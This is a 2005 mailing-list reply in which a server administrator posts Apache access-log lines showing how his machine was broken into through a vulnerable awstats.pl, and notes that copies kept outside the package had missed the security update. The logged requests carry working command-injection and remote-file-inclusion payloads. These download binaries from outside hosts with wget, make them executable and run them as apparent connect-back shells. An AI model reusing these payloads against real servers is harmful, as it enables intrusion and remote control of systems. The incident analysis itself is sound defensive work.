Re: Am I Compromised -- Some interesting findings
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Steve Kemp on Friday 25 Nov 2005 22:27 wrote:
> Looks like it was downloaded via wget.
>
> Run "grep wget /var/log/apache/access.log" - that should give you the
> IP address of the attackign host.
>
> It might be worth posting any matching lines; that way somebody might
> be able to tell you which script (cgi/php/etc) was used as the attack
> vector.
>
You were right.
Here's the output.
ns1:/var/log/apache2# grep wget access.log
211.20.11.206 - - [23/Nov/2005:03:51:48 -0800]
"GET /awstats/awstats.pl?configdir=
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
HTTP/1.1" 404 410 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.20.11.206 - - [23/Nov/2005:03:51:51 -0800]
"GET /cgi-bin/awstats/awstats.pl?configdir=
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
HTTP/1.1" 404 418 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
211.20.11.206 - - [23/Nov/2005:03:51:50 -0800]
"GET /cgi-bin/awstats.pl?configdir=
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
HTTP/1.1" 200 770 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
220.194.61.230 - - [23/Nov/2005:06:31:47 -0800]
"GET /awstats/awstats.pl?configdir=
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
HTTP/1.1" 404 410 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
220.194.61.230 - - [23/Nov/2005:06:31:48 -0800]
"GET /cgi-bin/awstats.pl?configdir=
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
HTTP/1.1" 200 770 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
220.194.61.230 - - [23/Nov/2005:06:31:50 -0800]
"GET /cgi-bin/awstats/awstats.pl?configdir=
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
HTTP/1.1" 404 418 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
209.250.116.251 - - [24/Nov/2005:04:32:29 -0800]
"GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://195.120.109.25/cmd.gif?&cmd=cd%20/tmp;wget%20217.160.255.44/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo|
HTTP/1.1" 404 402 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
209.250.116.251 - - [24/Nov/2005:04:32:31 -0800]
"GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://195.120.109.25/cmd.gif?&cmd=cd%20/tmp;wget%20217.160.255.44/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo|
HTTP/1.1" 200 39940 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)"
209.250.116.251 - - [24/Nov/2005:04:32:32 -0800]
"GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://195.120.109.25/cmd.gif?&cmd=cd%20/tmp;wget%20217.160.255.44/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo|
HTTP/1.1" 404 408 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
209.250.116.251 - - [24/Nov/2005:04:32:33 -0800]
"GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://195.120.109.25/cmd.gif?&cmd=cd%20/tmp;wget%20217.160.255.44/cback;chmod%20744%20cback;./cback%20217.160.242.90%208080;echo%20YYY;echo|
HTTP/1.1" 404 406 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
84.155.172.142 - - [24/Nov/2005:06:40:06 -0800]
"GET /awstats/awstats.pl?configdir=
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
HTTP/1.1" 404 410 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
84.155.172.142 - - [24/Nov/2005:06:40:12 -0800]
"GET /cgi-bin/awstats.pl?configdir=
echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
HTTP/1.1" 200 770 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
So as I understand, "awstats.pl" was the software to break-in into the
software. I know that there was a DSA issued against awstats but I got
delayed in updating my server because the other admin had used awstats
package the non-standard way.
He had just copied the awstats.pl file to each VirtualHost folder
individually. So even when I promptly had done the DSA update of awstats,
my server wasn't secure because the VirtualHosts were using a vulnerable
version of awstats.
If my understanding is right, it's a good and bitter lesson to learn.
:-(
Thanks for your input.
Regards,
rrs
- --
Ritesh Raj Sarraf
RESEARCHUT -- http://www.researchut.com
Gnupg Key ID: 04F130BC
"Stealing logic from one person is plagiarism, stealing from many is
research."
"Necessity is the mother of invention."
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)
iD8DBQFDh0bp4Rhi6gTxMLwRAhwBAJ9nSDOPnU7+hbOCwDQMpfIl7VwXYACePJLn
VmI3Plhrx5JAMqnAVFj9akQ=
=a/Gr
-----END PGP SIGNATURE-----
Reply to: